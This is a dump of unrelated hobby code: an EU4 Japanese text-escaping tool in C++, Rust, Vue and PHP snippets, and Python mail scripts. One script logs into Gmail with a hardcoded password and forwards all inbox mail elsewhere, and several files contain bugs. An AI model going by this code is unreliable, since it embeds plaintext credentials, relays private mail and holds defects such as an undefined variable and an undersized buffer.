match s.to_lowercase().as_str() {
"d" => Ok(Self::Dist),
"e" => Ok(Self::Dist),
"easy" => Ok(Self::Dist),
"dist" => Ok(Self::Dist),
"*" => Ok(Self::All),
"a" => Ok(Self::All),
"all" => Ok(Self::All),
"any" => Ok(Self::All),
"0" => Ok(Self::None),
"n" => Ok(Self::None),
"none" => Ok(Self::None),
_ => Err(Error::ParseError(s.to_string())),
}
}
}
/// Sets related to the special characters collating sequence
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub enum Special {
/// All special characters
All,
/// Only the most usual special characters
Basic,
/// No special characters
None,
}
impl FromStr for Special {
type Err = Error;
fn from_str(s: &str) -> Result<Self, Self::Err> {
match s.to_lowercase().as_str() {
"b" => Ok(Self::Basic),
"basic" => Ok(Self::Basic),
"*" => Ok(Self::All),
"a" => Ok(Self::All),
"all" => Ok(Self::All),
"any" => Ok(Self::All),
"0" => Ok(Self::None),
"n" => Ok(Self::None),
"none" => Ok(Self::None),
_ => Err(Error::ParseError(s.to_string())),
}
}
}
impl CollatingSeq for Alpha {
fn characters(&self) -> &[char] {
match *self {
Alpha::All => &ALPHA_ALL,
Alpha::Dist => &ALPHA_DIST,
Alpha::Lower => &ALPHA_LOWER,
Alpha::Upper => &ALPHA_UPPER,
Alpha::None => &NONE,
}
}
}
impl CollatingSeq for Digit {
fn characters(&self) -> &[char] {
match *self {
Digit::All => &DIGIT_ALL,
Digit::Dist => &DIGIT_DIST,
Digit::None => &NONE,
}
}
}
impl CollatingSeq for Special {
fn characters(&self) -> &[char] {
match *self {
Special::All => &SPECIAL_ALL,
Special::Basic => &SPECIAL_BASIC,
Special::None => &NONE,
}
}
}
| bd67870f651e89945382fd7c8efb8b2ef548a62d | [
"TOML",
"Rust",
"Markdown"
] | 10 | Rust | xgillard/passg | 20f37e0010e42c5dabfef63d1a4ae92476d8151c | 56ddf705c7dc74de95db1008e43ed48f6ffea9e2 |
refs/heads/master | <repo_name>841723906/EU4SpecialEscape<file_sep>/README.md
# EU4SpecialEscape
## これはなに?
Steam配信されているWindows版Europa Universalis IVの日本語化パッチの副産物です。パッチはこのプログラムを使って変換されたテキストのみを受け付けます。
## 環境
Windows7 以上
## 使いかたパターン1
適当なフォルダを用意します。
変換したいテキストが入ったファイルを下記に注意して、上記のフォルダ内に保存してください。上記のフォルダ内にさらにフォルダを作ってその中にテキストを置くような階層構造にしても大丈夫です。
- BOM付きのUTF-8
- ファイル名をxxx.utf8b.yyyにする。xxxは任意の文字列。yyyはa~zとA~Zと0~9のみ使用可能
上記のフォルダを、ConsoleApplication3.exeにドラッグアンドドロップしてください。フォルダ内に、xxx.yyyとして変換されたテキストが保存されます。
## 使い方パターン2
適当なフォルダを用意します。
変換したいテキストが入ったファイルを下記に注意して、上記のフォルダ内に保存してください。上記のフォルダ内にさらにフォルダを作ってその中にテキストを置くような階層構造にしても大丈夫です。
- BOMなしのUTF-8
- ファイル名をxxx.yyy.utf8にする。xxxは任意の文字列。yyyはa~zとA~Zと0~9とアンダースコア(_)のみ使用可能
上記のフォルダを、ConsoleApplication3.exeにドラッグアンドドロップしてください。フォルダ内に、xxx.yyyとして変換されたテキストが保存されます。
## ビルドの仕方
VC2015以上でConsoleApplication3.slnを開き、ビルドしてください。
## ライセンス
MITライセンス<file_sep>/ConsoleApplication3/ConsoleApplication3.cpp
#include "stdafx.h"
errno_t subUTF8(const wchar_t *source, wchar_t *baseFileName);
errno_t subUTF8B(const wchar_t *source, wchar_t *baseFileName);
errno_t loadTextFromBinary(const wchar_t *source, char **to) {
errno_t success = 0;
errno_t readFileError = 0;
FILE *fp;
int error = 0;
struct _stat statData;
int readSize = 0;
if (source == NULL) {
success = 1;
goto F;
}
/* */
error = _wstat(source, &statData);
if (error != NULL) {
success = 2;
goto F;
}
/* */
readFileError = _wfopen_s(&fp, source, L"rb");
if (readFileError != NULL) {
success = 3;
goto F;
}
/* */
*to = (char*)calloc(statData.st_size + 1, sizeof(char));
if (*to == NULL) {
success = 4;
goto A;
}
/* */
readSize = fread_s(*to, statData.st_size, sizeof(char), statData.st_size, fp);
if (readSize != statData.st_size) {
success = 5;
goto A;
}
A:
fclose(fp);
F:
return success;
}
errno_t removeBOM(const char *from, char **to) {
errno_t success = 0;
errno_t err = 0;
unsigned int size = 0;
/* */
if (from == NULL) {
success = 1;
goto A;
}
/* */
if (strlen(from) < 4) {
success = 2;
goto A;
}
/* */
if (!((from[0] == ((char)0xEF)) && (from[1] == (char)0xBB) && (from[2] == (char)0xBF))) {
success = 3;
goto A;
}
/* */
size = strlen(from);
/* */
*to = (char*)calloc(size - 2, sizeof(char));
if (*to == NULL) {
success = 4;
goto A;
}
/* */
err = memcpy_s(*to, size - 2, from + 3, size - 3);
if (err) {
success = 5;
goto B;
}
goto A;
B:
free(*to);
A:
return success;
}
errno_t convertTextToWideText(const char* from, wchar_t **to) {
errno_t success = 0;
unsigned int err = 0;
unsigned int wideTextSize = 0;
/* */
if (from == NULL) {
success = 1;
goto A;
}
/* */
wideTextSize = MultiByteToWideChar(
CP_UTF8,
NULL,
from,
-1,
NULL,
NULL);
if (wideTextSize == NULL) {
success = GetLastError();
goto A;
}
/* */
*to = (wchar_t*)calloc(wideTextSize, sizeof(wchar_t));
if (*to == NULL) {
success = 3;
goto A;
}
/* */
err = MultiByteToWideChar(
CP_UTF8,
NULL,
from,
-1,
*to,
wideTextSize);
if (err == NULL) {
success = 4;
goto B;
}
goto A;
B:
free(*to);
A:
return success;
}
inline wchar_t UCS2ToCP1252(int cp) {
wchar_t result = cp;
switch (cp) {
case 0x20AC: result = 0x80; break;
case 0x201A: result = 0x82; break;
case 0x0192: result = 0x83; break;
case 0x201E: result = 0x84; break;
case 0x2026: result = 0x85; break;
case 0x2020: result = 0x86; break;
case 0x2021: result = 0x87; break;
case 0x02C6: result = 0x88; break;
case 0x2030: result = 0x89; break;
case 0x0160: result = 0x8A; break;
case 0x2039: result = 0x8B; break;
case 0x0152: result = 0x8C; break;
case 0x017D: result = 0x8E; break;
case 0x2018: result = 0x91; break;
case 0x2019: result = 0x92; break;
case 0x201C: result = 0x93; break;
case 0x201D: result = 0x94; break;
case 0x2022: result = 0x95; break;
case 0x2013: result = 0x96; break;
case 0x2014: result = 0x97; break;
case 0x02DC: result = 0x98; break;
case 0x2122: result = 0x99; break;
case 0x0161: result = 0x9A; break;
case 0x203A: result = 0x9B; break;
case 0x0153: result = 0x9C; break;
case 0x017E: result = 0x9E; break;
case 0x0178: result = 0x9F; break;
}
return result;
}
inline wchar_t cp1252ToUCS2(byte cp) {
wchar_t result = cp;
switch (cp) {
case 0x80: result = 0x20AC; break;
case 0x82: result = 0x201A; break;
case 0x83: result = 0x0192; break;
case 0x84: result = 0x201E; break;
case 0x85: result = 0x2026; break;
case 0x86: result = 0x2020; break;
case 0x87: result = 0x2021; break;
case 0x88: result = 0x02C6; break;
case 0x89: result = 0x2030; break;
case 0x8A: result = 0x0160; break;
case 0x8B: result = 0x2039; break;
case 0x8C: result = 0x0152; break;
case 0x8E: result = 0x017D; break;
case 0x91: result = 0x2018; break;
case 0x92: result = 0x2019; break;
case 0x93: result = 0x201C; break;
case 0x94: result = 0x201D; break;
case 0x95: result = 0x2022; break;
case 0x96: result = 0x2013; break;
case 0x97: result = 0x2014; break;
case 0x98: result = 0x02DC; break;
case 0x99: result = 0x2122; break;
case 0x9A: result = 0x0161; break;
case 0x9B: result = 0x203A; break;
case 0x9C: result = 0x0153; break;
case 0x9E: result = 0x017E; break;
case 0x9F: result = 0x0178; break;
}
return result;
}
errno_t convertWideTextToEscapedWideText(const wchar_t* from, wchar_t** to) {
errno_t success = 0;
int toIndex = 0;
unsigned int size = 0;
/* */
if (from == NULL) {
success = 1;
goto A;
}
/* */
size = wcslen(from);
/* 全部エスケープしても3倍を超えることはない。10はバッファ*/
*to = (wchar_t*)calloc(size * 3 + 10, sizeof(wchar_t));
if (*to == NULL) {
success = 2;
goto A;
}
/* */
toIndex = 0;
for (unsigned int fromIndex = 0; fromIndex < size; fromIndex++) {
wchar_t cp = from[fromIndex];
/* */
if (UCS2ToCP1252(cp) != cp) {
(*to)[toIndex++] = cp;
continue;
}
/* ずらす */
if (cp > 0x100 && cp < 0xA00) {
cp = cp + 0xE000;
}
/* 上位バイト */
byte high = (cp >> 8) & 0x000000FF;
/* 下位バイト */
byte low = cp & 0x000000FF;
byte escapeChr = 0x10;
/* 2byteじゃない */
if (high == 0) {
(*to)[toIndex++] = cp;
continue;
}
/* high byteより決定 */
switch (high) {
case 0xA4:case 0xA3:case 0xA7:case 0x24:case 0x5B:case 0x00:case 0x5C:
case 0x20:case 0x0D:case 0x0A:case 0x22:case 0x7B:case 0x7D:case 0x40:
case 0x80:case 0x7E:case 0x2F:
escapeChr += 2;
break;
default:
break;
}
/* low byteより決定 */
switch (low) {
case 0xA4:case 0xA3:case 0xA7:case 0x24:case 0x5B:case 0x00:case 0x5C:
case 0x20:case 0x0D:case 0x0A:case 0x22:case 0x7B:case 0x7D:case 0x40:
case 0x80:case 0x7E:case 0x2F:
escapeChr++;
break;
default:
break;
}
switch (escapeChr) {
case 0x11:
low += 14;
break;
case 0x12:
high -= 9;
break;
case 0x13:
low += 14;
high -= 9;
break;
case 0x10:
default:
break;
}
(*to)[toIndex++] = escapeChr;
(*to)[toIndex++] = cp1252ToUCS2(low);
(*to)[toIndex++] = cp1252ToUCS2(high);
}
A:
return success;
}
errno_t convertWideTextToText(const wchar_t* from, char **to) {
errno_t success = 0;
int size = 0;
int err = 0;
/* */
if (from == NULL) {
success = 1;
goto A;
}
/* */
size = WideCharToMultiByte(
CP_UTF8,
0,
from,
-1,
NULL,
0,
NULL,
NULL
);
if (size == NULL) {
success = 2;
goto A;
}
/* */
*to = (char*)malloc(size * sizeof(char));
if (*to == NULL) {
success = 3;
goto A;
}
/* */
err = WideCharToMultiByte(
CP_UTF8,
0,
from,
-1,
*to,
size,
NULL,
NULL
);
if (err == NULL) {
success = 4;
goto B;
}
goto A;
B:
free(*to);
A:
return success;
}
errno_t attachWildCard(const wchar_t* from, wchar_t ** to) {
errno_t error = 0;
unsigned int size = 0;
errno_t err = 0;
/* */
if (from == NULL) {
error = 1;
goto A;
}
/* */
size = wcslen(from);
/* */
*to = (wchar_t*)calloc(size + 3, sizeof(wchar_t));
if (*to == NULL) {
error = 2;
goto A;
}
/* */
err = wmemcpy_s(*to, size, from, size);
if (err) {
error = 3;
goto B;
}
/* */
(*to)[size] = L'\\';
(*to)[size + 1] = L'*';
/* */
goto A;
B:
free(*to);
A:
return error;
}
errno_t attachBOM(const char* from, char ** to) {
errno_t error = 0;
unsigned int size = 0;
/* */
if (from == NULL) {
error = 1;
goto A;
}
/* */
size = strlen(from);
/* */
*to = (char*)calloc(size + 4, sizeof(char));
if (*to == NULL) {
error = 2;
goto A;
}
/* UTF-8 BOM */
(*to)[0] = (char)0xEF;
(*to)[1] = (char)0xBB;
(*to)[2] = (char)0xBF;
/* */
if (memcpy_s(*to + 3, size + 4, from, size)) {
error = 3;
goto B;
}
/* */
goto A;
B:
free(*to);
A:
return error;
}
/* Cpp code */
const std::wregex FILE_NAME_PATTERN1(L"^(.+)\.utf8b(\.[a-zA-Z0-9]+)$");
const std::wregex FILE_NAME_PATTERN2(L"^(.+)\.(\.[a-zA-Z0-9_]+).utf8$");
inline errno_t getBaseFileName(const wchar_t *source, wchar_t **to, const std::wregex pattern) {
errno_t error = 0;
std::wcmatch match;
/* */
try {
if (!std::regex_match(source, match, pattern)) {
/* Not match */
*to = NULL;
goto A;
}
/* */
unsigned int size = wcslen(source);
/* */
*to = (wchar_t*)calloc(size, sizeof(wchar_t));
if (*to == NULL) {
error = 1;
goto A;
}
/* */
std::wstring tmp = match.str(1); /* + match.str( */
wcscat_s(*to, tmp.length() + 1, tmp.c_str());
}
catch (std::regex_error& e) {
error = 1;
}
A:
return error;
}
errno_t getFullPath(wchar_t *from[], wchar_t **to) {
errno_t error = 0;
wchar_t *err = NULL;
/* */
if (!(*++from)) {
error = 1;
goto F;
}
/* */
*to = (wchar_t*)calloc(_MAX_PATH, sizeof(wchar_t));
if (*to == NULL) {
error = 2;
goto F;
}
/* */
err = _wfullpath(*to, *from, _MAX_PATH);
if (*err == NULL) {
error = 3;
goto A;
}
/* */
goto F;
A:
free(*to);
F:
return error;
}
/* http://www14.big.or.jp/~ken1/tech/tech5.html */
errno_t digDir(const wchar_t *source)
{
errno_t success = 0;
wchar_t subpath[_MAX_PATH];
wchar_t temp[_MAX_PATH];
HANDLE h;
WIN32_FIND_DATA lp;
/* */
errno_t err = wcscpy_s(temp, source);
if (err > 0) {
success = 1;
goto A;
}
/* */
h = FindFirstFile(temp, &lp);
if (INVALID_HANDLE_VALUE == h) {
success = 2;
goto A;
}
/* delete last '*' */
temp[wcslen(temp) - 1] = '\0';
/* */
do
{
/* isDir */
if ((lp.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&
(wcscmp(lp.cFileName, L"..") != 0) &&
(wcscmp(lp.cFileName, L".") != 0)
) {
/* TODO:check len */
int len = wsprintf(subpath, L"%s%s\\*", temp, lp.cFileName);
/* */
errno_t err2 = digDir(subpath);
if (err2 > 0) {
success = 3;
goto B;
}
}
/* isFile */
if ((lp.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) != FILE_ATTRIBUTE_DIRECTORY) {
/* */
wchar_t *baseFileName;
errno_t err3 = getBaseFileName(lp.cFileName, &baseFileName,FILE_NAME_PATTERN1);
if (err3 > 0) {
success = 4;
goto B;
}
/* */
if (baseFileName != NULL) {
/* TODO:check len */
wchar_t fileFullPath[_MAX_PATH];
int len = wsprintf(fileFullPath, L"%s%s", temp, lp.cFileName);
/* */
errno_t errSub = subUTF8B(fileFullPath, baseFileName);
free(baseFileName);
if (errSub > 0) {
goto B;
}
}
else {
errno_t err4 = getBaseFileName(lp.cFileName, &baseFileName, FILE_NAME_PATTERN2);
if (err4 > 0) {
success = 4;
goto B;
}
if (baseFileName != NULL) {
/* TODO:check len */
wchar_t fileFullPath[_MAX_PATH];
int len = wsprintf(fileFullPath, L"%s%s", temp, lp.cFileName);
/* */
errno_t errSub = subUTF8(fileFullPath, baseFileName);
free(baseFileName);
if (errSub > 0) {
goto B;
}
}
}
}
} while (FindNextFile(h, &lp));
B:
FindClose(h);
A:
return success;
}
/**/
int wmain(int argc, wchar_t *argv[], wchar_t *envp[])
{
errno_t error = 0;
wchar_t *fullPath = NULL;
wchar_t *attachWildCardFullPath = NULL;
/* */
error = getFullPath(argv, &fullPath);
if (error > 0) {
printf("引数異常:%d", error);
goto A;
}
/* */
error = attachWildCard(fullPath, &attachWildCardFullPath);
if (error > 0) {
printf("ワイルドカード添付異常:%d", error);
goto B;
}
/* */
error = digDir(attachWildCardFullPath);
if (error > 0) {
printf("ディレクトリ検出異常:%d", error);
goto C;
}
C:
free(attachWildCardFullPath);
B:
free(fullPath);
A:
return 0;
}
errno_t saveTextToBinary2(const wchar_t *source, const wchar_t *baseFileName, const char* from) {
errno_t success = 0;
int file_size = 0;
errno_t fopen_err = 0;
if (source == NULL) {
success = 1;
goto F;
}
wchar_t drive[_MAX_DRIVE];
wchar_t dir[_MAX_DIR];
wchar_t fname[_MAX_FNAME];
wchar_t ext[_MAX_EXT];
/* */
_wsplitpath_s(
source,
drive,
dir,
fname,
ext
);
/* */
wchar_t exportPath[_MAX_EXT];
_wmakepath_s(exportPath, drive, dir, fname, L"");
/* */
FILE *fw;
fopen_err = _wfopen_s(&fw, exportPath, L"wb");
if (fopen_err) {
success = 3;
goto F;
}
/* */
file_size = fwrite(from, sizeof(char), strlen(from), fw);
if (file_size != strlen(from)) {
success = 4;
goto A;
}
A:
fclose(fw);
F:
return success;
}
errno_t saveTextToBinary(const wchar_t *source, const wchar_t *baseFileName, const char* from) {
errno_t success = 0;
int file_size = 0;
errno_t fopen_err = 0;
if (source == NULL) {
success = 1;
goto F;
}
wchar_t drive[_MAX_DRIVE];
wchar_t dir[_MAX_DIR];
wchar_t fname[_MAX_FNAME];
wchar_t ext[_MAX_EXT];
/* */
_wsplitpath_s(
source,
drive,
dir,
fname,
ext
);
/* */
wchar_t exportPath[_MAX_EXT];
_wmakepath_s(exportPath, drive, dir, baseFileName, ext);
/* */
FILE *fw;
fopen_err = _wfopen_s(&fw, exportPath, L"wb");
if (fopen_err) {
success = 3;
goto F;
}
/* */
file_size = fwrite(from, sizeof(char), strlen(from), fw);
if (file_size != strlen(from)) {
success = 4;
goto A;
}
A:
fclose(fw);
F:
return success;
}
/* */
errno_t subUTF8(const wchar_t *source, wchar_t *baseFileName) {
errno_t ans = 0;
char *importText = NULL;
char *noBOMtext = NULL;
wchar_t *wideNoBOMtext = NULL;
wchar_t *escapedNoBOMWideText = NULL;
char *escapedNoBOMText = NULL;
char* escapedText = NULL;
/* */
ans = loadTextFromBinary(source, &importText);
if (ans > 0) {
printf("ファイルからテキストを読み込めない:%d", ans);
goto A;
}
/* */
ans = convertTextToWideText(importText, &wideNoBOMtext);
if (ans > 0) {
printf("M->Wが変換できなかった:%d", ans);
goto C;
}
/* */
ans = convertWideTextToEscapedWideText(wideNoBOMtext, &escapedNoBOMWideText);
if (ans > 0) {
printf("エスケープに失敗した:%d", ans);
goto D;
}
/* */
ans = convertWideTextToText(escapedNoBOMWideText, &escapedNoBOMText);
if (ans > 0) {
printf("W->Mが変換できなかった:%d", ans);
goto E;
}
/* */
ans = attachBOM(escapedNoBOMText, &escapedText);
if (ans > 0) {
printf("BOMをつけるのに失敗:%d", ans);
goto F;
}
/* */
ans = saveTextToBinary2(source, baseFileName, escapedText);
if (ans > 0) {
printf("ファイルをセーブするのに失敗:%d", ans);
}
G:
free(escapedText);
F:
free(escapedNoBOMText);
E:
free(escapedNoBOMWideText);
D:
free(wideNoBOMtext);
C:
free(noBOMtext);
B:
free(importText);
A:
return ans;
}
/* */
errno_t subUTF8B(const wchar_t *source, wchar_t *baseFileName) {
errno_t ans = 0;
char *importText = NULL;
char *noBOMtext = NULL;
wchar_t *wideNoBOMtext = NULL;
wchar_t *escapedNoBOMWideText = NULL;
char *escapedNoBOMText = NULL;
char* escapedText = NULL;
/* */
ans = loadTextFromBinary(source, &importText);
if (ans > 0) {
printf("ファイルからテキストを読み込めない:%d", ans);
goto A;
}
/* */
ans = removeBOM(importText, &noBOMtext);
if (ans > 0) {
printf("BOMがついていないからUTF-8じゃない:%d", ans);
goto B;
}
/* */
ans = convertTextToWideText(noBOMtext, &wideNoBOMtext);
if (ans > 0) {
printf("M->Wが変換できなかった:%d", ans);
goto C;
}
/* */
ans = convertWideTextToEscapedWideText(wideNoBOMtext, &escapedNoBOMWideText);
if (ans > 0) {
printf("エスケープに失敗した:%d", ans);
goto D;
}
/* */
ans = convertWideTextToText(escapedNoBOMWideText, &escapedNoBOMText);
if (ans > 0) {
printf("W->Mが変換できなかった:%d", ans);
goto E;
}
/* */
ans = attachBOM(escapedNoBOMText, &escapedText);
if (ans > 0) {
printf("BOMをつけるのに失敗:%d",ans);
goto F;
}
/* */
ans = saveTextToBinary(source, baseFileName, escapedText);
if (ans > 0) {
printf("ファイルをセーブするのに失敗:%d", ans);
goto G;
}
G:
free(escapedText);
F:
free(escapedNoBOMText);
E:
free(escapedNoBOMWideText);
D:
free(wideNoBOMtext);
C:
free(noBOMtext);
B:
free(importText);
A:
return ans;
}
| 0a46ea15d95717b147cbbcded0ebd34bd187badc | [
"Markdown",
"C++"
] | 2 | Markdown | 841723906/EU4SpecialEscape | 3c9a1cc633ff71c8bd52744b25320bf701fa19fa | 41bf39cd56f44d333c130c7c2d809c79c0826f90 |
refs/heads/main | <repo_name>Katia-Casta/examen<file_sep>/index.php
<!DOCTYPE html>
<html>
<head>
<title>CASTAÑEDA</title>
<meta charset="utf-8">
<?php require_once "dependencias.php"; ?>
<?php require_once "contenido.php"; $datos=contenido();?>
<script type="text/javascript" src="script.js"></script>
<link rel="stylesheet" href="css/estilos/stilo.css">
</head>
<body >
<body background="img/fondo1.jpg">
<div class="container">
<h1 class="tinta1"> B A M B O O </h1>
<h2 class="tinta2">Conoce a los Pandas</h2>
<div class="hola">
<?php require_once "movi.php";
?>
</div>
</div>
</body>
</html>
<file_sep>/contenido.php
<?php
function contenido(){
$datos=array();
$datos[0]="img/panda3.jpg"."||".
"OSO PANDA"."||".
"El oso panda es un animal mamífero que habita en zonas montañosas y boscosas de China. Se trata de una especie plantígrada (ya que, al desplazarse, apoya la totalidad de la planta de las manos y de los pies en la superficie) que se caracteriza por la combinación de pelo negro en las orejas, la cara, los hombros y las patas y pelo blanco en el resto del cuerpo.";
$datos[1]="img/panda2.jpg"."||".
"PANDA Y GRUPO FAMILIAR"."||".
"El panda pertenece al grupo familiar de los úrsidos u osos, de acuerdo a diversos estudios científicos. Sin embargo, tiempo atrás solía ubicarse al panda entre los prociónidos o mapaches.";
$datos[2]="img/panda1.jpg"."||".
"ALIMENTACION DEL PANDA"."||".
"En la mitología griega, el centauro es una criatura con la cabeza, los brazos y el torso de un humano y el cuerpo y las patas de un caballo. Las versiones femeninas reciben el nombre de centáurides.";
return $datos;
}
?> | 5b704c9b67f51ce97497190c55f77fb71fd7f6c3 | [
"PHP"
] | 2 | PHP | Katia-Casta/examen | 59a994246b45b65eeaa15784460e56730ce5f693 | c3b2c2a98fac85234157e122ddff15f0227c5be5 |
refs/heads/master | <file_sep>var app = new Vue({
el: '#app',
created: function(){
this.getData()
},
methods: {
getData: function(){
var vm = this;
$.ajax({
url: 'https://jsonplaceholder.typicode.com/posts',
method: 'GET'
}).then(function (data) {
vm.items = data;
});
}
},
data () {
return {
search: '',
headers: [
{
text: 'No.',
align: 'left',
sortable: false,
value: 'no'
},
{ text: 'HO ID', value: 'hoid', sortable: false },
{ text: 'Commission', value: 'commission' },
{ text: 'Deposit', value: 'deposit' },
{ text: 'Deposit(Transfer)', value: 'deptransfer' },
{ text: 'Withdraw', value: 'withdraw' },
{ text: 'Withdraw(Transfer)', value: 'withtransfer' },
{ text: 'Betting Amount', value: 'betamount' },
{ text: 'Rake', value: 'rake' },
{ text: 'User Holding Money', value: 'userholding' },
{ text: 'Operating Head Office Profit', value: 'offprofit' },
{ text: 'Head Office Money', value: 'offmoney' },
{ text: 'Money of Low Rank', value: 'moneylowrank' },
{ text: 'Low Rank', value: 'lowrank' },
],
items: []
}
}
}); | f63755fdaf4064f51a2d4adea8b0ae529765a799 | [
"JavaScript"
] | 1 | JavaScript | tristansalao/vuejs-ex | b80485b47e2107e6e60ba6d2701dd2ae48724fd2 | cbff0b424f2f02df429a8afac7792c8c858d4915 |
refs/heads/master | <file_sep>import os
import sys
import logging
sys.path.append('Module/')
from MailSend import mxmMail
# Allow us to run using installed `libgmail` or the one in parent directory.
try:
import libgmail
## Wouldn't this the preffered way?
## We shouldn't raise a warning about a normal import
##logging.warn("Note: Using currently installed `libgmail` version.")
except ImportError:
# Urghhh...
sys.path.insert(1,
os.path.realpath(os.path.join(os.path.dirname(__file__),
os.path.pardir)))
import libgmail
# -*- Encoding: UTF-8 -*-
from MailSend import mxmMail
serveur = '192.168.1.24' # votre serveur SMTP ici
ga = libgmail.GmailAccount("<EMAIL>", "fdfgdfgdfgfg")
ga.login()
folder = ga.getMessagesByFolder('inbox',True)
for thread in folder:
for msg in thread:
expediteur = msg.sender
print expediteur
destinataire = "<EMAIL>"
sujet = msg.subject
message = msg
print message
if msg.attachments:
for attach in msg.attachments :
myMsg.prependFile(attach)
myMsg.attachmentAppend(attach)
myMsg = mxmMail("Forward", expediteur, sujet,message,serveur)
myMsg.recipientAppend('Clients', destinataire)
myMsg.send()
print "done"
<file_sep>#!/usr/bin/env python
# -*- Encoding: UTF-8 -*-
"""
Ceci est une reprise du programme mxmail.
24/03/2006 -utilisation du module email
"""
import string, sys, types, os, tempfile, time
import email
from email import Encoders
from email.MIMEAudio import MIMEAudio
from email.MIMEBase import MIMEBase
from email.MIMEImage import MIMEImage
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
import mimetypes
import smtplib
def FICHIER( chemin ):
"""Guess the content type based on the file's extension. Encoding
will be ignored, altough we should check for simple things like
gzip'd or compressed files."""
ctype, encoding = mimetypes.guess_type(chemin)
if ctype is None or encoding is not None:
# No guess could be made, or the file is encoded (compresses), so
# use a generic bag-of-bits type.
ctype = 'application.octet-stream'
maintype, subtype = ctype.split('/', 1)
if maintype == 'text':
fp = open(chemin)
# Note : we should handle calculating the charset
msg = MIMEText(fp.read(), _subtype=subtype)
fp.close()
elif maintype == 'image':
fp = open(chemin, 'rb')
msg = MIMEImage(fp.read(), _subtype=subtype)
fp.close()
elif maintype == 'audio':
fp = open(chemin, 'rb')
msg = MIMEAudio(fp.read(), _subtype=subtype)
fp.close()
else:
fp = open(chemin, 'rb')
msg = MIMEBase(maintype, subtype)
msg.set_payload(fp.read())
fp.close()
# Encode the payload using Base64
Encoders.encode_base64(msg)
# Set the filename parameter
fichier = os.path.basename(chemin)
msg.add_header('Content-Disposition','attachment',filename=fichier)
return msg
class mxmMail:
"""
mxmMail est client e-mail qui permet d'envoyer un e-mail de la même façon
qu'en utilisant un simple client e-mail comme outlook express ou le client
mail de netscape.
Licence: TIUISICIIDC (Take it, use it, sell it, change it. I dont care.)
contact: <EMAIL>, <EMAIL>, <EMAIL>
"""
def __init__(self, fromName='', fromAddress='', subject='', message='', SMTPServer=''):
self.fromName = fromName
self.fromAddress = fromAddress
self.subject = subject
self.message = message
self.recipients = []
self.attachments = []
self.SMTPServer = SMTPServer
def __str__(self):
return self.message
def prepend(self, text):
"""
Ajoute une chaine avant le corps du message.
"""
self.message = text + self.message
def append(self, text):
"""
Ajoute une chaine après le corps du message.
"""
self.message = self.message + text
def prependFile(self, fileName):
"""
Cette méthode ajoute le contenu d'un fichier texte avant le corps du
message.
Une utilisation est d'ajouter fichier d'entête commun au début du
message.
Cela peut être fait plusieurs fois pour ajouter différents fichiers
texte dans un ordre spécifique.
Si le fichier ne peut être ouvert, la méthode va échoué silencieusement.
C'est un choix délibéré pour que les mailings automatiques ne soient pas
arrêtés par des fichiers entêtes/pieds manquants.
"""
try:
file = open(fileName)
self.prepend(file.read())
except:
pass # Just fail silently
def appendFile(self, fileName):
"""
Cette méthode ajoute le contenu d'un fichier texte avant le corps du
message.
Une utilisation est d'ajouter un fichier signature à la fin du message.
Cela peut être fait plusieurs fois pour ajouter différents fichiers
texte dans un ordre spécifique.
Si le fichier ne peut être ouvert, la méthode va échouer silencieusement.
C'est un choix délibéré pour que les mailings automatiques ne soient pas
arrêtés par des fichiers entêtes/pieds manquants.
"""
try:
file = open(fileName)
self.append(file.read())
except:
pass # Just fail silently
def recipientAppend(self, toName, toAddress):
"""
Ajoute un destinataire de plus au message.
"""
self.recipients.append({'toName':toName, 'toAddress':toAddress})
def setRecipients(self, recipients=[]):
self.recipients = recipients
def attachmentAppend(self, fileName):
"""
Ajoute une pièce jointe au message. Elle est automatiquement converti
dans un type mime.
"""
self.attachments.append(fileName)
def send(self):
"""Envoie le message."""
message = MIMEMultipart()
message['From'] = self.fromAddress
message['Subject'] = self.subject
recipientList = []
for recipient in self.recipients:
recipientList.append(recipient['toAddress'])
adressList = string.join(recipientList, '; ')
message['To'] = adressList
if type(self.message) == str:
message.attach(MIMEText(self.message,'html') )
elif type(self.message) == unicode:
message.attach( MIMEText(self.message.encode('utf-8'), 'html', 'utf-8') )
for attachFile in self.attachments:
# encodes the attached files
if type(attachFile) == types.StringType:
fileName = attachFile
filePath = attachFile
elif type(attachFile) == types.TupleType and len(attachFile) == 2:
filePath,fileName = attachFile
else:
raise "Attachments Error: must be pathname string or path,filename tuple"
message.attach( FICHIER(attachFile) )
#try:
server = smtplib.SMTP(self.SMTPServer)
server.sendmail(self.fromAddress, recipientList, message.as_string())
#finally:
server.quit()
def save(self, fileName):
"""
Saves the message to a file. Including attachements and pre/appended files.
"""
file = open(fileName, 'w')
file.write(str(self))
file.close()
if __name__ == '__main__':
# Exemple d'utilisation de la classe mxmMail
serveur = 'smtp.wanadoo.fr' # votre serveur SMTP ici
expediteur = '<EMAIL>' # Votre adresse email
destinataire = '<EMAIL>' # L'adresse de votre destinataire
sujet = u"Un message du président de la république"
message = u'<html><body><a href="http://www.bussieresama.net">bussiere</a></body></html>'
#myMsg = mxmMail(NomExpéditeur, AdresseExpediteur, Sujet, Texte, serveurSMTP)
myMsg = mxmMail("<NAME>", expediteur, sujet,message,serveur)
# Ajoute un destinataire : myMsg.recipientAppend(Nom, Adresse)
myMsg.recipientAppend('Bussiere', destinataire)
#myMsg.prependFile('D:/Programmation/MailSend/test.txt')
#myMsg.appendFile('C:/root/desktop/sig.txt')
myMsg.attachmentAppend('D:/Programmation/MailSend/test.txt')
#myMsg.setRecipients([{'toName':'fghdfg','toAddress':'<EMAIL>'}, {'toName':'xcvxcv','toAddress':'<EMAIL>'}])
myMsg.send()
# vim:ts=4<file_sep>import cherrypy
class roote:
def __init__(self):
pass
nom = ""
passwd = ""
def doLogin(self, username=None, password=None):
self.nom = username
self.passwd = password
return self.page()
def index(self,username=None,password=None):
return self.page()
index.exposed = True
doLogin.exposed = True
def page(self):
h1 = header_begin()
h2 = header_end()
page = """
<form action="doLogin" method="post">
<p>Username</p>
<input type="text" name="username" size="15" maxlength="40"/>
<p>Password</p>
<input type="password" name="password" value=""
size="10" maxlength="40"/>
<p><input type="submit" value="Login"/></p>
<p><input type="reset" value="Clear"/></p>
</form>
"""
page = "%s %s %s %s %s" %(h1.printh(),page,self.nom,self.passwd,h2.printh())
return page
<file_sep>import psycopg2,array
conn = psycopg2.connect("user=memoria password=<PASSWORD> host=127.0.0.1 dbname=dbmemoria")
curs = conn.cursor()
